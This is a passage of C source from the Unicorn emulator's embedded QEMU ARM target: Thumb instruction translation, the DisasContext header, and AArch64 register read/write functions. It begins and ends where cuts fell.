the IT block. // In other words, treat the whole IT block as // a single instruction. uc->no_exit_request = (dc->condexec_mask != 0); // Unicorn: trace this instruction on request insn_size = is_16bit ? 
2 : 4; if (HOOK_EXISTS_BOUNDED(uc, UC_HOOK_CODE, dc->base.pc_next - insn_size)) { // Sync PC in advance gen_set_pc_im(dc, dc->base.pc_next - insn_size); if (uc->no_exit_request) { gen_uc_tracecode(tcg_ctx, insn_size, UC_HOOK_CODE_IDX | UC_HOOK_FLAG_NO_STOP, uc, dc->base.pc_next - insn_size); } else { gen_uc_tracecode(tcg_ctx, insn_size, UC_HOOK_CODE_IDX, uc, dc->base.pc_next - insn_size); } // the callback might want to stop emulation immediately check_exit_request(tcg_ctx); } if (is_16bit) { disas_thumb_insn(dc, insn); } else { disas_thumb2_insn(dc, insn); } /* Advance the Thumb condexec condition. */ if (dc->condexec_mask) { dc->condexec_cond = ((dc->condexec_cond & 0xe) | ((dc->condexec_mask >> 4) & 1)); dc->condexec_mask = (dc->condexec_mask << 1) & 0x1f; if (dc->condexec_mask == 0) { dc->condexec_cond = 0; } } arm_post_translate_insn(dc); /* Thumb is a variable-length ISA. Stop translation when the next insn * will touch a new page. This ensures that prefetch aborts occur at * the right place. * * We want to stop the TB if the next insn starts in a new page, * or if it spans between this page and the next. This means that * if we're looking at the last halfword in the page we need to * see if it's a 16-bit Thumb insn (which will fit in this TB) * or a 32-bit Thumb insn (which won't). * This is to avoid generating a silly TB with a single 16-bit insn * in it at the end of this page (which would execute correctly * but isn't very efficient). */ if (dc->base.is_jmp == DISAS_NEXT && (dc->base.pc_next - dc->page_start >= TARGET_PAGE_SIZE || (dc->base.pc_next - dc->page_start >= TARGET_PAGE_SIZE - 3 && insn_crosses_page(env, dc)))) { dc->base.is_jmp = DISAS_TOO_MANY; } } static void arm_tr_tb_stop(DisasContextBase *dcbase, CPUState *cpu) { DisasContext *dc = container_of(dcbase, DisasContext, base); struct uc_struct *uc = dc->uc; TCGContext *tcg_ctx = uc->tcg_ctx; if (tb_cflags(dc->base.tb) & CF_LAST_IO && dc->condjmp) { /* FIXME: This can theoretically happen with self-modifying code. */ cpu_abort(cpu, "IO on conditional branch instruction"); } /* At this stage dc->condjmp will only be set when the skipped instruction was a conditional branch or trap, and the PC has already been written. */ gen_set_condexec(dc); if (dc->base.is_jmp == DISAS_BX_EXCRET) { /* Exception return branches need some special case code at the * end of the TB, which is complex enough that it has to * handle the single-step vs not and the condition-failed * insn codepath itself. */ gen_bx_excret_final_code(dc); } else if (unlikely(is_singlestepping(dc))) { /* Unconditional and "condition passed" instruction codepath. */ switch (dc->base.is_jmp) { case DISAS_SWI: gen_ss_advance(dc); gen_exception(tcg_ctx, EXCP_SWI, syn_aa32_svc(dc->svc_imm, dc->thumb), default_exception_el(dc)); break; case DISAS_HVC: gen_ss_advance(dc); gen_exception(tcg_ctx, EXCP_HVC, syn_aa32_hvc(dc->svc_imm), 2); break; case DISAS_SMC: gen_ss_advance(dc); gen_exception(tcg_ctx, EXCP_SMC, syn_aa32_smc(), 3); break; case DISAS_NEXT: case DISAS_TOO_MANY: case DISAS_UPDATE: gen_set_pc_im(dc, dc->base.pc_next); /* fall through */ default: /* FIXME: Single stepping a WFI insn will not halt the CPU. */ gen_singlestep_exception(dc); break; case DISAS_NORETURN: break; } } else { /* While branches must always occur at the end of an IT block, there are a few other things that can cause us to terminate the TB in the middle of an IT block: - Exception generating instructions (bkpt, swi, undefined). - Page boundaries. - Hardware watchpoints. 
Hardware breakpoints have already been handled and skip this code. */ switch(dc->base.is_jmp) { case DISAS_NEXT: case DISAS_TOO_MANY: gen_goto_tb(dc, 1, dc->base.pc_next); break; case DISAS_JUMP: gen_goto_ptr(tcg_ctx); break; case DISAS_UPDATE: gen_set_pc_im(dc, dc->base.pc_next); /* fall through */ default: /* indicate that the hash table must be used to find the next TB */ tcg_gen_exit_tb(tcg_ctx, NULL, 0); break; case DISAS_NORETURN: /* nothing more to generate */ break; case DISAS_WFI: { gen_set_pc_im(dc, dc->base.pc_next); TCGv_i32 tmp = tcg_const_i32(tcg_ctx, (dc->thumb && !(dc->insn & (1U << 31))) ? 2 : 4); gen_helper_wfi(tcg_ctx, tcg_ctx->cpu_env, tmp); tcg_temp_free_i32(tcg_ctx, tmp); /* The helper doesn't necessarily throw an exception, but we * must go back to the main loop to check for interrupts anyway. */ tcg_gen_exit_tb(tcg_ctx, NULL, 0); break; } case DISAS_WFE: gen_helper_wfe(tcg_ctx, tcg_ctx->cpu_env); break; case DISAS_YIELD: gen_helper_yield(tcg_ctx, tcg_ctx->cpu_env); break; case DISAS_SWI: gen_exception(tcg_ctx, EXCP_SWI, syn_aa32_svc(dc->svc_imm, dc->thumb), default_exception_el(dc)); break; case DISAS_HVC: gen_exception(tcg_ctx, EXCP_HVC, syn_aa32_hvc(dc->svc_imm), 2); break; case DISAS_SMC: gen_exception(tcg_ctx, EXCP_SMC, syn_aa32_smc(), 3); break; } } if (dc->condjmp) { /* "Condition failed" instruction codepath for the branch/trap insn */ gen_set_label(tcg_ctx, dc->condlabel); gen_set_condexec(dc); if (unlikely(is_singlestepping(dc))) { gen_set_pc_im(dc, dc->base.pc_next); gen_singlestep_exception(dc); } else { gen_goto_tb(dc, 1, dc->base.pc_next); } } } static const TranslatorOps arm_translator_ops = { .init_disas_context = arm_tr_init_disas_context, .tb_start = arm_tr_tb_start, .insn_start = arm_tr_insn_start, .breakpoint_check = arm_tr_breakpoint_check, .translate_insn = arm_tr_translate_insn, .tb_stop = arm_tr_tb_stop, }; static const TranslatorOps thumb_translator_ops = { .init_disas_context = arm_tr_init_disas_context, .tb_start = arm_tr_tb_start, .insn_start = arm_tr_insn_start, .breakpoint_check = arm_tr_breakpoint_check, .translate_insn = thumb_tr_translate_insn, .tb_stop = arm_tr_tb_stop, }; /* generate intermediate code for basic block 'tb'. 
*/ void gen_intermediate_code(CPUState *cpu, TranslationBlock *tb, int max_insns) { DisasContext dc = { 0 }; const TranslatorOps *ops = &arm_translator_ops; if (FIELD_EX32(tb->flags, TBFLAG_AM32, THUMB)) { ops = &thumb_translator_ops; } #ifdef TARGET_AARCH64 if (FIELD_EX32(tb->flags, TBFLAG_ANY, AARCH64_STATE)) { ops = &aarch64_translator_ops; } #endif translator_loop(ops, &dc.base, cpu, tb, max_insns); } void restore_state_to_opc(CPUARMState *env, TranslationBlock *tb, target_ulong *data) { if (is_a64(env)) { env->pc = data[0]; env->condexec_bits = 0; env->exception.syndrome = data[2] << ARM_INSN_START_WORD2_SHIFT; } else { env->regs[15] = data[0]; env->condexec_bits = data[1]; env->exception.syndrome = data[2] << ARM_INSN_START_WORD2_SHIFT; } }

unicorn-2.1.1/qemu/target/arm/translate.h

#ifndef TARGET_ARM_TRANSLATE_H #define TARGET_ARM_TRANSLATE_H #include "exec/translator.h" #include "internals.h" struct uc_struct; /* internal defines */ typedef struct DisasContext { DisasContextBase base; const ARMISARegisters *isar; /* The address of the current instruction being translated. */ target_ulong pc_curr; target_ulong page_start; uint32_t insn; /* Nonzero if this instruction has been conditionally skipped. */ int condjmp; /* The label that will be jumped to when the instruction is skipped. */ TCGLabel *condlabel; /* Thumb-2 conditional execution bits. */ int condexec_mask; int condexec_cond; int thumb; int sctlr_b; MemOp be_data; int user; ARMMMUIdx mmu_idx; /* MMU index to use for normal loads/stores */ uint8_t tbii; /* TBI1|TBI0 for insns */ uint8_t tbid; /* TBI1|TBI0 for data */ bool ns; /* Use non-secure CPREG bank on access */ int fp_excp_el; /* FP exception EL or 0 if enabled */ int sve_excp_el; /* SVE exception EL or 0 if enabled */ int sve_len; /* SVE vector length in bytes */ /* Flag indicating that exceptions from secure mode are routed to EL3. */ bool secure_routed_to_el3; bool vfp_enabled; /* FP enabled via FPSCR.EN */ int vec_len; int vec_stride; bool v7m_handler_mode; bool v8m_secure; /* true if v8M and we're in Secure mode */ bool v8m_stackcheck; /* true if we need to perform v8M stack limit checks */ bool v8m_fpccr_s_wrong; /* true if v8M FPCCR.S != v8m_secure */ bool v7m_new_fp_ctxt_needed; /* ASPEN set but no active FP context */ bool v7m_lspact; /* FPCCR.LSPACT set */ /* Immediate value in AArch32 SVC insn; must be set if is_jmp == DISAS_SWI * so that top level loop can generate correct syndrome information. */ uint32_t svc_imm; int aarch64; int current_el; /* Debug target exception level for single-step exceptions */ int debug_target_el; GHashTable *cp_regs; uint64_t features; /* CPU features bits */ /* Because unallocated encodings generate different exception syndrome * information from traps due to FP being disabled, we can't do a single * "is fp access disabled" check at a high level in the decode tree. 
* To help in catching bugs where the access check was forgotten in some * code path, we set this flag when the access check is done, and assert * that it is set at the point where we actually touch the FP regs. */ bool fp_access_checked; /* ARMv8 single-step state (this is distinct from the QEMU gdbstub * single-step support). */ bool ss_active; bool pstate_ss; /* True if the insn just emitted was a load-exclusive instruction * (necessary for syndrome information for single step exceptions), * ie A64 LDX*, LDAX*, A32/T32 LDREX*, LDAEX*. */ bool is_ldex; /* True if AccType_UNPRIV should be used for LDTR et al */ bool unpriv; /* True if v8.3-PAuth is active. */ bool pauth_active; /* True with v8.5-BTI and SCTLR_ELx.BT* set. */ bool bt; /* True if any CP15 access is trapped by HSTR_EL2 */ bool hstr_active; /* * >= 0, a copy of PSTATE.BTYPE, which will be 0 without v8.5-BTI. * < 0, set by the current instruction. */ int8_t btype; /* True if this page is guarded. */ bool guarded_page; /* Bottom two bits of XScale c15_cpar coprocessor access control reg */ int c15_cpar; /* TCG op of the current insn_start. */ TCGOp *insn_start; #define TMP_A64_MAX 16 int tmp_a64_count; TCGv_i64 tmp_a64[TMP_A64_MAX]; // Unicorn struct uc_struct *uc; } DisasContext; typedef struct DisasCompare { TCGCond cond; TCGv_i32 value; bool value_global; } DisasCompare; static inline int arm_dc_feature(DisasContext *dc, int feature) { return (dc->features & (1ULL << feature)) != 0; } static inline int get_mem_index(DisasContext *s) { return arm_to_core_mmu_idx(s->mmu_idx); } /* Function used to determine the target exception EL when otherwise not known * or default. */ static inline int default_exception_el(DisasContext *s) { /* If we are coming from secure EL0 in a system with a 32-bit EL3, then * there is no secure EL1, so we route exceptions to EL3. Otherwise, * exceptions can only be routed to ELs above 1, so we target the higher of * 1 or the current EL. */ return (s->mmu_idx == ARMMMUIdx_SE10_0 && s->secure_routed_to_el3) ? 3 : MAX(1, s->current_el); } static inline void disas_set_insn_syndrome(DisasContext *s, uint32_t syn) { /* We don't need to save all of the syndrome so we mask and shift * out unneeded bits to help the sleb128 encoder do a better job. */ syn &= ARM_INSN_START_WORD2_MASK; syn >>= ARM_INSN_START_WORD2_SHIFT; /* We check and clear insn_start_idx to catch multiple updates. */ assert(s->insn_start != NULL); tcg_set_insn_start_param(s->insn_start, 2, syn); s->insn_start = NULL; } /* is_jmp field values */ #define DISAS_JUMP DISAS_TARGET_0 /* only pc was modified dynamically */ #define DISAS_UPDATE DISAS_TARGET_1 /* cpu state was modified dynamically */ /* These instructions trap after executing, so the A32/T32 decoder must * defer them until after the conditional execution state has been updated. * WFI also needs special handling when single-stepping. */ #define DISAS_WFI DISAS_TARGET_2 #define DISAS_SWI DISAS_TARGET_3 /* WFE */ #define DISAS_WFE DISAS_TARGET_4 #define DISAS_HVC DISAS_TARGET_5 #define DISAS_SMC DISAS_TARGET_6 #define DISAS_YIELD DISAS_TARGET_7 /* M profile branch which might be an exception return (and so needs * custom end-of-TB code) */ #define DISAS_BX_EXCRET DISAS_TARGET_8 /* For instructions which want an immediate exit to the main loop, * as opposed to attempting to use lookup_and_goto_ptr. 
Unlike * DISAS_UPDATE this doesn't write the PC on exiting the translation * loop so you need to ensure something (gen_a64_set_pc_im or runtime * helper) has done so before we reach return from cpu_tb_exec. */ #define DISAS_EXIT DISAS_TARGET_9 #ifdef TARGET_AARCH64 void a64_translate_init(struct uc_struct *uc); void gen_a64_set_pc_im(TCGContext *tcg_ctx, uint64_t val); extern const TranslatorOps aarch64_translator_ops; #else static inline void a64_translate_init(struct uc_struct *uc) { } static inline void gen_a64_set_pc_im(uint64_t val) { } #endif void arm_test_cc(TCGContext *tcg_ctx, DisasCompare *cmp, int cc); void arm_free_cc(TCGContext *tcg_ctx, DisasCompare *cmp); void arm_jump_cc(TCGContext *tcg_ctx, DisasCompare *cmp, TCGLabel *label); void arm_gen_test_cc(TCGContext *tcg_ctx, int cc, TCGLabel *label); /* Return state of Alternate Half-precision flag, caller frees result */ static inline TCGv_i32 get_ahp_flag(TCGContext *tcg_ctx) { TCGv_i32 ret = tcg_temp_new_i32(tcg_ctx); tcg_gen_ld_i32(tcg_ctx, ret, tcg_ctx->cpu_env, offsetof(CPUARMState, vfp.xregs[ARM_VFP_FPSCR])); tcg_gen_extract_i32(tcg_ctx, ret, ret, 26, 1); return ret; } /* Set bits within PSTATE. */ static inline void set_pstate_bits(TCGContext *tcg_ctx, uint32_t bits) { TCGv_i32 p = tcg_temp_new_i32(tcg_ctx); tcg_debug_assert(!(bits & CACHED_PSTATE_BITS)); tcg_gen_ld_i32(tcg_ctx, p, tcg_ctx->cpu_env, offsetof(CPUARMState, pstate)); tcg_gen_ori_i32(tcg_ctx, p, p, bits); tcg_gen_st_i32(tcg_ctx, p, tcg_ctx->cpu_env, offsetof(CPUARMState, pstate)); tcg_temp_free_i32(tcg_ctx, p); } /* Clear bits within PSTATE. */ static inline void clear_pstate_bits(TCGContext *tcg_ctx, uint32_t bits) { TCGv_i32 p = tcg_temp_new_i32(tcg_ctx); tcg_debug_assert(!(bits & CACHED_PSTATE_BITS)); tcg_gen_ld_i32(tcg_ctx, p, tcg_ctx->cpu_env, offsetof(CPUARMState, pstate)); tcg_gen_andi_i32(tcg_ctx, p, p, ~bits); tcg_gen_st_i32(tcg_ctx, p, tcg_ctx->cpu_env, offsetof(CPUARMState, pstate)); tcg_temp_free_i32(tcg_ctx, p); } /* If the singlestep state is Active-not-pending, advance to Active-pending. */ static inline void gen_ss_advance(DisasContext *s) { TCGContext *tcg_ctx = s->uc->tcg_ctx; if (s->ss_active) { s->pstate_ss = 0; clear_pstate_bits(tcg_ctx, PSTATE_SS); } } static inline void gen_exception(TCGContext *tcg_ctx, int excp, uint32_t syndrome, uint32_t target_el) { TCGv_i32 tcg_excp = tcg_const_i32(tcg_ctx, excp); TCGv_i32 tcg_syn = tcg_const_i32(tcg_ctx, syndrome); TCGv_i32 tcg_el = tcg_const_i32(tcg_ctx, target_el); gen_helper_exception_with_syndrome(tcg_ctx, tcg_ctx->cpu_env, tcg_excp, tcg_syn, tcg_el); tcg_temp_free_i32(tcg_ctx, tcg_el); tcg_temp_free_i32(tcg_ctx, tcg_syn); tcg_temp_free_i32(tcg_ctx, tcg_excp); } /* Generate an architectural singlestep exception */ static inline void gen_swstep_exception(DisasContext *s, int isv, int ex) { TCGContext *tcg_ctx = s->uc->tcg_ctx; bool same_el = (s->debug_target_el == s->current_el); /* * If singlestep is targeting a lower EL than the current one, * then s->ss_active must be false and we can never get here. */ assert(s->debug_target_el >= s->current_el); gen_exception(tcg_ctx, EXCP_UDEF, syn_swstep(same_el, isv, ex), s->debug_target_el); } /* * Given a VFP floating point constant encoded into an 8 bit immediate in an * instruction, expand it to the actual constant value of the specified * size, as per the VFPExpandImm() pseudocode in the Arm ARM. */ uint64_t vfp_expand_imm(int size, uint8_t imm8); /* Vector operations shared between ARM and AArch64. 
*/ extern const GVecGen3 mla_op[4]; extern const GVecGen3 mls_op[4]; extern const GVecGen3 cmtst_op[4]; extern const GVecGen3 sshl_op[4]; extern const GVecGen3 ushl_op[4]; extern const GVecGen2i ssra_op[4]; extern const GVecGen2i usra_op[4]; extern const GVecGen2i sri_op[4]; extern const GVecGen2i sli_op[4]; extern const GVecGen4 uqadd_op[4]; extern const GVecGen4 sqadd_op[4]; extern const GVecGen4 uqsub_op[4]; extern const GVecGen4 sqsub_op[4]; void gen_cmtst_i64(TCGContext *, TCGv_i64 d, TCGv_i64 a, TCGv_i64 b); void gen_ushl_i32(TCGContext *, TCGv_i32 d, TCGv_i32 a, TCGv_i32 b); void gen_sshl_i32(TCGContext *, TCGv_i32 d, TCGv_i32 a, TCGv_i32 b); void gen_ushl_i64(TCGContext *, TCGv_i64 d, TCGv_i64 a, TCGv_i64 b); void gen_sshl_i64(TCGContext *, TCGv_i64 d, TCGv_i64 a, TCGv_i64 b); /* * Forward to the isar_feature_* tests given a DisasContext pointer. */ #define dc_isar_feature(name, ctx) isar_feature_##name(ctx->isar) #endif /* TARGET_ARM_TRANSLATE_H */

unicorn-2.1.1/qemu/target/arm/unicorn.h

/* Unicorn Emulator Engine */ /* By Nguyen Anh Quynh <aquynh@gmail.com>, 2015 */ #ifndef UC_QEMU_TARGET_ARM_H #define UC_QEMU_TARGET_ARM_H // functions to read & write registers uc_err reg_read_arm(void *env, int mode, unsigned int regid, void *value, size_t *size); uc_err reg_read_aarch64(void *env, int mode, unsigned int regid, void *value, size_t *size); uc_err reg_write_arm(void *env, int mode, unsigned int regid, const void *value, size_t *size, int *setpc); uc_err reg_write_aarch64(void *env, int mode, unsigned int regid, const void *value, size_t *size, int *setpc); void uc_init_arm(struct uc_struct *uc); void uc_init_aarch64(struct uc_struct *uc); #endif

unicorn-2.1.1/qemu/target/arm/unicorn_aarch64.c

/* Unicorn Emulator Engine */ /* By Nguyen Anh Quynh <aquynh@gmail.com>, 2015 */ /* Modified for Unicorn Engine by 
Chen Huitao<chenhuitao@hfmrit.com>, 2020 */ #include "qemu/typedefs.h" #include "unicorn/unicorn.h" #include "sysemu/cpus.h" #include "cpu.h" #include "kvm-consts.h" #include "unicorn_common.h" #include "uc_priv.h" #include "unicorn.h" ARMCPU *cpu_aarch64_init(struct uc_struct *uc); static void arm64_set_pc(struct uc_struct *uc, uint64_t address) { ((CPUARMState *)uc->cpu->env_ptr)->pc = address; } static uint64_t arm64_get_pc(struct uc_struct *uc) { return ((CPUARMState *)uc->cpu->env_ptr)->pc; } static void arm64_release(void *ctx) { int i; TCGContext *tcg_ctx = (TCGContext *)ctx; ARMCPU *cpu = (ARMCPU *)tcg_ctx->uc->cpu; CPUTLBDesc *d = cpu->neg.tlb.d; CPUTLBDescFast *f = cpu->neg.tlb.f; CPUTLBDesc *desc; CPUTLBDescFast *fast; ARMELChangeHook *entry, *next; CPUARMState *env = &cpu->env; uint32_t nr; release_common(ctx); for (i = 0; i < NB_MMU_MODES; i++) { desc = &(d[i]); fast = &(f[i]); g_free(desc->iotlb); g_free(fast->table); } QLIST_FOREACH_SAFE(entry, &cpu->pre_el_change_hooks, node, next) { QLIST_SAFE_REMOVE(entry, node); g_free(entry); } QLIST_FOREACH_SAFE(entry, &cpu->el_change_hooks, node, next) { QLIST_SAFE_REMOVE(entry, node); g_free(entry); } if (arm_feature(env, ARM_FEATURE_PMSA) && arm_feature(env, ARM_FEATURE_V7)) { nr = cpu->pmsav7_dregion; if (nr) { if (arm_feature(env, ARM_FEATURE_V8)) { g_free(env->pmsav8.rbar[M_REG_NS]); g_free(env->pmsav8.rlar[M_REG_NS]); if (arm_feature(env, ARM_FEATURE_M_SECURITY)) { g_free(env->pmsav8.rbar[M_REG_S]); g_free(env->pmsav8.rlar[M_REG_S]); } } else { g_free(env->pmsav7.drbar); g_free(env->pmsav7.drsr); g_free(env->pmsav7.dracr); } } } if (arm_feature(env, ARM_FEATURE_M_SECURITY)) { nr = cpu->sau_sregion; if (nr) { g_free(env->sau.rbar); g_free(env->sau.rlar); } } g_free(cpu->cpreg_indexes); g_free(cpu->cpreg_values); g_free(cpu->cpreg_vmstate_indexes); g_free(cpu->cpreg_vmstate_values); g_hash_table_destroy(cpu->cp_regs); } static void reg_reset(struct uc_struct *uc) { CPUArchState *env = uc->cpu->env_ptr; memset(env->xregs, 0, sizeof(env->xregs)); env->pc = 0; } static uc_err read_cp_reg(CPUARMState *env, uc_arm64_cp_reg *cp) { ARMCPU *cpu = ARM_CPU(env->uc->cpu); const ARMCPRegInfo *ri = get_arm_cp_reginfo( cpu->cp_regs, ENCODE_AA64_CP_REG(CP_REG_ARM64_SYSREG_CP, cp->crn, cp->crm, cp->op0, cp->op1, cp->op2)); if (!ri) { return UC_ERR_ARG; } cp->val = read_raw_cp_reg(env, ri); return UC_ERR_OK; } static uc_err write_cp_reg(CPUARMState *env, uc_arm64_cp_reg *cp) { ARMCPU *cpu = ARM_CPU(env->uc->cpu); const ARMCPRegInfo *ri = get_arm_cp_reginfo( cpu->cp_regs, ENCODE_AA64_CP_REG(CP_REG_ARM64_SYSREG_CP, cp->crn, cp->crm, cp->op0, cp->op1, cp->op2)); if (!ri) { return UC_ERR_ARG; } if (ri->raw_writefn) { ri->raw_writefn(env, ri, cp->val); } else if (ri->writefn) { ri->writefn(env, ri, cp->val); } else { if (cpreg_field_is_64bit(ri)) { CPREG_FIELD64(env, ri) = cp->val; } else { CPREG_FIELD32(env, ri) = cp->val; } } return UC_ERR_OK; } DEFAULT_VISIBILITY uc_err reg_read(void *_env, int mode, unsigned int regid, void *value, size_t *size) { CPUARMState *env = _env; uc_err ret = UC_ERR_ARG; if (regid >= UC_ARM64_REG_V0 && regid <= UC_ARM64_REG_V31) { regid += UC_ARM64_REG_Q0 - UC_ARM64_REG_V0; } if (regid >= UC_ARM64_REG_X0 && regid <= UC_ARM64_REG_X28) { CHECK_REG_TYPE(uint64_t); *(uint64_t *)value = env->xregs[regid - UC_ARM64_REG_X0]; } else if (regid >= UC_ARM64_REG_W0 && regid <= UC_ARM64_REG_W30) { CHECK_REG_TYPE(uint32_t); *(uint32_t *)value = READ_DWORD(env->xregs[regid - UC_ARM64_REG_W0]); } else if (regid >= UC_ARM64_REG_Q0 && regid 
<= UC_ARM64_REG_Q31) { // FIXME CHECK_REG_TYPE(float64[2]); float64 *dst = (float64 *)value; uint32_t reg_index = regid - UC_ARM64_REG_Q0; dst[0] = env->vfp.zregs[reg_index].d[0]; dst[1] = env->vfp.zregs[reg_index].d[1]; } else if (regid >= UC_ARM64_REG_D0 && regid <= UC_ARM64_REG_D31) { CHECK_REG_TYPE(float64); *(float64 *)value = env->vfp.zregs[regid - UC_ARM64_REG_D0].d[0]; } else if (regid >= UC_ARM64_REG_S0 && regid <= UC_ARM64_REG_S31) { CHECK_REG_TYPE(int32_t); *(int32_t *)value = READ_DWORD(env->vfp.zregs[regid - UC_ARM64_REG_S0].d[0]); } else if (regid >= UC_ARM64_REG_H0 && regid <= UC_ARM64_REG_H31) { CHECK_REG_TYPE(int16_t); *(int16_t *)value = READ_WORD(env->vfp.zregs[regid - UC_ARM64_REG_H0].d[0]); } else if (regid >= UC_ARM64_REG_B0 && regid <= UC_ARM64_REG_B31) { CHECK_REG_TYPE(int8_t); *(int8_t *)value = READ_BYTE_L(env->vfp.zregs[regid - UC_ARM64_REG_B0].d[0]); } else if (regid >= UC_ARM64_REG_ELR_EL0 && regid <= UC_ARM64_REG_ELR_EL3) { CHECK_REG_TYPE(uint64_t); *(uint64_t *)value = env->elr_el[regid - UC_ARM64_REG_ELR_EL0]; } else if (regid >= UC_ARM64_REG_SP_EL0 && regid <= UC_ARM64_REG_SP_EL3) { CHECK_REG_TYPE(uint64_t); *(uint64_t *)value = env->sp_el[regid - UC_ARM64_REG_SP_EL0]; } else if (regid >= UC_ARM64_REG_ESR_EL0 && regid <= UC_ARM64_REG_ESR_EL3) { CHECK_REG_TYPE(uint64_t); *(uint64_t *)value = env->cp15.esr_el[regid - UC_ARM64_REG_ESR_EL0]; } else if (regid >= UC_ARM64_REG_FAR_EL0 && regid <= UC_ARM64_REG_FAR_EL3) { CHECK_REG_TYPE(uint64_t); *(uint64_t *)value = env->cp15.far_el[regid - UC_ARM64_REG_FAR_EL0]; } else if (regid >= UC_ARM64_REG_VBAR_EL0 && regid <= UC_ARM64_REG_VBAR_EL3) { CHECK_REG_TYPE(uint64_t); *(uint64_t *)value = env->cp15.vbar_el[regid - UC_ARM64_REG_VBAR_EL0]; } else { switch (regid) { default: break; case UC_ARM64_REG_CPACR_EL1: CHECK_REG_TYPE(uint32_t); *(uint32_t *)value = env->cp15.cpacr_el1; break; case UC_ARM64_REG_TPIDR_EL0: CHECK_REG_TYPE(uint64_t); *(uint64_t *)value = env->cp15.tpidr_el[0]; break; case UC_ARM64_REG_TPIDRRO_EL0: CHECK_REG_TYPE(uint64_t); *(uint64_t *)value = env->cp15.tpidrro_el[0]; break; case UC_ARM64_REG_TPIDR_EL1: CHECK_REG_TYPE(uint64_t); *(uint64_t *)value = env->cp15.tpidr_el[1]; break; case UC_ARM64_REG_X29: CHECK_REG_TYPE(uint64_t); *(uint64_t *)value = env->xregs[29]; break; case UC_ARM64_REG_X30: CHECK_REG_TYPE(uint64_t); *(uint64_t *)value = env->xregs[30]; break; case UC_ARM64_REG_PC: CHECK_REG_TYPE(uint64_t); *(uint64_t *)value = env->pc; break; case UC_ARM64_REG_SP: CHECK_REG_TYPE(uint64_t); *(uint64_t *)value = env->xregs[31]; break; case UC_ARM64_REG_NZCV: CHECK_REG_TYPE(uint32_t); *(uint32_t *)value = cpsr_read(env) & CPSR_NZCV; break; case UC_ARM64_REG_PSTATE: CHECK_REG_TYPE(uint32_t); *(uint32_t *)value = pstate_read(env); break; case UC_ARM64_REG_TTBR0_EL1: CHECK_REG_TYPE(uint64_t); *(uint64_t *)value = env->cp15.ttbr0_el[1]; break; case UC_ARM64_REG_TTBR1_EL1: CHECK_REG_TYPE(uint64_t); *(uint64_t *)value = env->cp15.ttbr1_el[1]; break; case UC_ARM64_REG_PAR_EL1: CHECK_REG_TYPE(uint64_t); *(uint64_t *)value = env->cp15.par_el[1]; break; case UC_ARM64_REG_MAIR_EL1: CHECK_REG_TYPE(uint64_t); *(uint64_t *)value = env->cp15.mair_el[1]; break; case UC_ARM64_REG_CP_REG: CHECK_REG_TYPE(uc_arm64_cp_reg); ret = read_cp_reg(env, (uc_arm64_cp_reg *)value); break; case UC_ARM64_REG_FPCR: CHECK_REG_TYPE(uint32_t); *(uint32_t *)value = vfp_get_fpcr(env); break; case UC_ARM64_REG_FPSR: CHECK_REG_TYPE(uint32_t); *(uint32_t *)value = vfp_get_fpsr(env); break; } } return ret; } DEFAULT_VISIBILITY uc_err 
reg_write(void *_env, int mode, unsigned int regid, const void *value, size_t *size, int *setpc) { CPUARMState *env = _env; uc_err ret = UC_ERR_ARG; if (regid >= UC_ARM64_REG_V0 && regid <= UC_ARM64_REG_V31) { regid += UC_ARM64_REG_Q0 - UC_ARM64_REG_V0; } if (regid >= UC_ARM64_REG_X0 && regid <= UC_ARM64_REG_X28) { CHECK_REG_TYPE(uint64_t); env->xregs[regid - UC_ARM64_REG_X0] = *(uint64_t *)value; } else if (regid >= UC_ARM64_REG_W0 && regid <= UC_ARM64_REG_W30) { CHECK_REG_TYPE(uint32_t); WRITE_DWORD(env->xregs[regid - UC_ARM64_REG_W0], *(uint32_t *)value); } else if (regid >= UC_ARM64_REG_Q0 && regid <= UC_ARM64_REG_Q31) { CHECK_REG_TYPE(float64[2]); float64 *src = (float64 *)value; uint32_t reg_index = regid - UC_ARM64_REG_Q0; env->vfp.zregs[reg_index].d[0] = src[0]; env->vfp.zregs[reg_index].d[1] = src[1]; } else if (regid >= UC_ARM64_REG_D0 && regid <= UC_ARM64_REG_D31) { CHECK_REG_TYPE(float64); env->vfp.zregs[regid - UC_ARM64_REG_D0].d[0] = *(float64 *)value; } else if (regid >= UC_ARM64_REG_S0 && regid <= UC_ARM64_REG_S31) { CHECK_REG_TYPE(int32_t); WRITE_DWORD(env->vfp.zregs[regid - UC_ARM64_REG_S0].d[0], *(int32_t *)value); } else if (regid >= UC_ARM64_REG_H0 && regid <= UC_ARM64_REG_H31) { CHECK_REG_TYPE(int16_t); WRITE_WORD(env->vfp.zregs[regid - UC_ARM64_REG_H0].d[0], *(int16_t *)value); } else if (regid >= UC_ARM64_REG_B0 && regid <= UC_ARM64_REG_B31) { CHECK_REG_TYPE(int8_t); WRITE_BYTE_L(env->vfp.zregs[regid - UC_ARM64_REG_B0].d[0], *(int8_t *)value); } else if (regid >= UC_ARM64_REG_ELR_EL0 && regid <= UC_ARM64_REG_ELR_EL3) { CHECK_REG_TYPE(uint64_t); env->elr_el[regid - UC_ARM64_REG_ELR_EL0] = *(uint64_t *)value; } else if (regid >= UC_ARM64_REG_SP_EL0 && regid <= UC_ARM64_REG_SP_EL3) { CHECK_REG_TYPE(uint64_t); env->sp_el[regid - UC_ARM64_REG_SP_EL0] = *(uint64_t *)value; } else if (regid >= UC_ARM64_REG_ESR_EL0 && regid <= UC_ARM64_REG_ESR_EL3) { CHECK_REG_TYPE(uint64_t); env->cp15.esr_el[regid - UC_ARM64_REG_ESR_EL0] = *(uint64_t *)value; } else if (regid >= UC_ARM64_REG_FAR_EL0 && regid <= UC_ARM64_REG_FAR_EL3) { CHECK_REG_TYPE(uint64_t); env->cp15.far_el[regid - UC_ARM64_REG_FAR_EL0] = *(uint64_t *)value; } else if (regid >= UC_ARM64_REG_VBAR_EL0 && regid <= UC_ARM64_REG_VBAR_EL3) { CHECK_REG_TYPE(uint64_t); env->cp15.vbar_el[regid - UC_ARM64_REG_VBAR_EL0] = *(uint64_t *)value; } else { switch (regid) { default: break; case UC_ARM64_REG_CPACR_EL1: CHECK_REG_TYPE(uint32_t); env->cp15.cpacr_el1 = *(uint32_t *)value; break; case UC_ARM64_REG_TPIDR_EL0: CHECK_REG_TYPE(uint64_t); env->cp15.tpidr_el[0] = *(uint64_t *)value; break; case UC_ARM64_REG_TPIDRRO_EL0: CHECK_REG_TYPE(uint64_t); env->cp15.tpidrro_el[0] = *(uint64_t *)value; break; case UC_ARM64_REG_TPIDR_EL1: CHECK_REG_TYPE(uint64_t); env->cp15.tpidr_el[1] = *(uint64_t *)value; break; case UC_ARM64_REG_X29: 